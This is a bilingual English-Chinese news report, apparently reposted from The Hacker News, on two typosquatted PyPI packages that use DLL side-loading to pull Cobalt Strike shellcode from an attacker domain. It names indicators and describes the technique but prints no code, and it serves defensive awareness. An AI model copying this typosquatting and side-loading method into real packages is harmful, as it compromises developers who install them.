发现新恶意PyPI软件包使用隐蔽的侧向加载策略

Cybersecurity researchers have discovered two malicious packages on the Python Package Index (PyPI) repository that were found leveraging a technique called DLL side-loading to circumvent detection by security software and run malicious code.

网络安全研究人员发现了Python软件包索引（PyPI）存储库中的两个恶意软件包，发现它们利用一种称为DLL侧加载的技术来规避安全软件的检测并运行恶意代码。

The packages, named NP6HelperHttptest and NP6HelperHttper, were each downloaded 537 and 166 times, respectively, before they were taken down.

这两个软件包分别名为NP6HelperHttptest和NP6HelperHttper，在被下架之前分别下载了537次和166次。

"The latest discovery is an example of DLL sideloading executed by an open-source package that suggests the scope of software supply chain threats is expanding," ReversingLabs researcher Petar Kirhmajer said in a report shared with The Hacker News.

ReversingLabs的研究人员Petar Kirhmajer在与The Hacker News分享的报告中表示：“最新的发现是一个由开源软件包执行的DLL侧载示例，表明软件供应链威胁的范围正在扩大。”

The name NP6 is notable as it refers to a legitimate marketing automation solution made by ChapsVision. In particular, the fake packages are typosquats of NP6HelperHttp and NP6HelperConfig, which are helper tools published by one of ChapsVision's employees to PyPI.

NP6这个名字引人注目，因为它指的是由ChapsVision制作的合法营销自动化解决方案。特别是，这些虚假软件包是NP6HelperHttp和NP6HelperConfig的拼写错误版本，这两个是ChapsVision的员工发布到PyPI的辅助工具。

In other words, the goal is to trick developers searching for NP6HelperHttp and NP6HelperConfig into downloading their rogue counterparts.

换句话说，目标是欺骗搜索NP6HelperHttp和NP6HelperConfig的开发人员下载它们的恶意对应软件。

Contained within the two libraries is a setup.py script that's designed to download two files, an actual executable from Beijing-based Kingsoft Corporation ("ComServer.exe") that's vulnerable to DLL side-loading and the malicious DLL to be side-loaded ("dgdeskband64.dll").

这两个库中包含一个setup.py脚本，旨在下载两个文件，一个来自北京金山公司的实际可执行文件（“ComServer.exe”），它容易受到DLL侧加载攻击，以及待侧加载的恶意DLL（“dgdeskband64.dll”）。

In side-loading the DLL, the aim is to avoid detection of the malicious code, as observed previously in the case of an npm package called aabquerys that also leveraged the same technique to execute code capable of deploying a remote access trojan.

通过侧加载DLL，旨在避免恶意代码的检测，正如之前观察到的一个npm软件包aabquerys的情况，该软件包也利用相同的技术执行能够部署远程访问木马的代码。

The DLL, for its part, reaches out to an attacker-controlled domain ("us.archive-ubuntu[.]top") to fetch a GIF file that, in reality, is a piece of shellcode for a Cobalt Strike Beacon, a post-exploitation toolkit used for red teaming.

至于DLL，它会联系一个由攻击者控制的域（“us.archive-ubuntu[.]top”），以获取一个实际上是用于红队行动的Cobalt Strike Beacon的shellcode的GIF文件。

There is evidence to suggest that the packages are part of a wider campaign that involves the distribution of similar executables that are susceptible to DLL side-loading.

有证据表明这些软件包是更广泛的活动的一部分，涉及分发易受DLL侧加载攻击的类似可执行文件。

"Development organizations need to be aware of the threats related to supply chain security and open-source package repositories," security researcher Karlo Zanki said.

安全研究人员Karlo Zanki表示：“开发组织需要意识到与供应链安全和开源软件包存储库相关的威胁。”

"Even if they are not using open-source package repositories, that doesn't mean that threat actors won't abuse them to impersonate companies and their software products and tools."

“即使他们没有使用开源软件包存储库，也并不意味着威胁行为者不会滥用它们来冒充公司及其软件产品和工具。”

原文始发于微信公众号（知机安全）：发现新恶意PyPI软件包使用隐蔽的侧向加载策略